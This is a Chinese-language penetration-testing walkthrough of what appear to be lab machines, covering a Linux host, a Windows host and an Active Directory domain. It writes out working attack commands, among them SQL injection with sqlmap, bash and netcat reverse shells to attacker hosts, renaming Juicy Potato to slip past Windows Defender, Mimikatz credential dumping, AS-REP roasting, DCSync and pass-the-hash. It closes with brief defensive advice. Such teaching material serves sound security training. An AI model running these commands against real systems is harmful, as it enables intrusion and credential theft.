HackBox(贰)渗透测试实战教学文档

目标一：Linux系统渗透（10.10.10.46）

1. 信息收集

• 使用nmap扫描目标：

  nmap -sV -A 10.10.10.46
  

2. FTP弱口令利用

• 使用提供的凭据连接FTP：

  ftp 10.10.10.46
  用户名：ftpuser
  密码：mc@F1l3ZilL4
  

• 下载backup.zip文件并解压

3. 密码破解

• 使用John the Ripper破解压缩包密码：

  zip2john backup.zip > hash.txt
  john --wordlist=rockyou.txt hash.txt
  

  获取密码：741852963

4. Web应用分析

• 查看解压后的index.php文件，发现密码经过MD5加密
• 解密MD5哈希获取明文密码

5. SQL注入攻击

• 使用sqlmap进行注入：

  sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=53lcir034mo2u04lsnpsi9pkp7"
  

• 获取os-shell后建立反向shell：

  bash -c 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1'
  

6. 权限提升

• 升级到TTY shell：

  SHELL=/bin/bash script -q /dev/null
  

• 分析dashboard.php源码获取sudo特权密码
• 利用vi编辑/etc/postgresql/11/main/pg_hba.conf获取root权限

目标二：Windows系统渗透（10.10.10.29）

1. 信息收集

• nmap扫描：

  nmap -sV -A 10.10.10.29
  

2. Web目录扫描

• 使用gobuster扫描目录：

  gobuster dir -u http://10.10.10.29 -w /path/to/wordlist.txt
  

  发现wordpress目录

3. WordPress后台爆破

• 使用常见密码P@s5w0rd!成功登录后台

4. 获取Meterpreter shell

• 使用Metasploit模块获取初始访问权限
• 上传netcat二进制文件建立稳定shell

5. 权限提升（Juicy Potato）

• 上传Juicy Potato二进制文件（需重命名绕过Windows Defender）
• 创建执行批处理文件：

  echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.2 1111 > shell.bat
  

• 执行漏洞利用：

  js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337
  

6. 凭证获取

• 使用Mimikatz获取域用户名密码

目标三：Active Directory域渗透（10.10.10.30）

1. 信息收集

• masscan全端口扫描：

  masscan -p1-65535 10.10.10.30 --rate=1000
  

  发现Kerberos(88)、LDAP(389)、WinRM(5985)端口

2. BloodHound域枚举

• 使用bloodhound-python收集域信息：

  bloodhound-python -d megacorp.local -u sandra -p "Password1234!" -gc pathfinder.megacorp.local -c all -ns 10.10.10.30
  

• 启动Neo4j和BloodHound分析数据

3. AS-REP Roasting攻击

• 使用GetNPUsers.py获取TGT票证：

  GetNPUsers.py megacorp.local/svc_bes -request -no-pass -dc-ip 10.10.10.30
  

• 使用Hashcat破解获取密码：Sheffield19

4. WinRM访问

• 使用evil-winrm连接：

  evil-winrm -i 10.10.10.30 -u svc_bes -p Sheffield19
  

5. DCSync攻击

• 使用secretsdump.py转储域用户哈希：

  secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30
  

6. 横向移动

• 使用psexec.py进行哈希传递攻击：

  psexec.py megacorp.local/administrator@10.10.10.30 -hashes <NTLM hash>:<NTLM hash>
  

关键工具和技术详解

1. BloodHound分析

• 安装：

  apt install neo4j bloodhound
  neo4j start console
  bloodhound --no-sandbox
  

• 核心查询：
  • Find all Domain Admins
  • Find Shortest Paths to Domain Admins
  • Find Principals with DCSync Rights
  • Find AS-REP Roastable Users

2. Kerberos攻击技术

• AS-REP Roasting：针对不需要预认证的账户
• DCSync：模拟域控制器行为复制用户哈希
• 黄金票据：伪造TGT获取域持久访问

3. Windows提权技术

• Juicy Potato：利用SeImpersonate特权升级
• Mimikatz：提取内存中的凭证
• Pass-the-Hash：使用NTLM哈希进行认证

4. Linux提权技术

• SUID/SGID滥用：查找可执行文件进行提权
• sudo配置错误：利用不安全的sudo权限
• 内核漏洞利用：使用公开的exp提权

防御建议

1. 密码策略：

   • 禁用常见弱密码
   • 实施密码复杂度要求
   • 定期轮换密码

2. 服务加固：

   • 禁用不必要的服务
   • 更新补丁修复已知漏洞
   • 限制网络访问

3. Active Directory防护：

   • 监控DCSync活动
   • 限制特权账户
   • 启用Kerberos预认证

4. 日志监控：

   • 收集和分析安全日志
   • 设置异常活动警报
   • 定期审计权限配置

本教学文档详细记录了从初始信息收集到最终获取域管理员权限的完整渗透测试流程，涵盖了Linux、Windows系统和Active Directory环境的多种攻击技术。